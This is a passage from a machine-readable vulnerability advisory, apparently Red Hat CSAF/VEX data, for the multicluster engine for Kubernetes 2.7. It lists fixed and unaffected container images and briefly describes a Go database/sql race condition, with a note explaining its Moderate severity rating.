"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
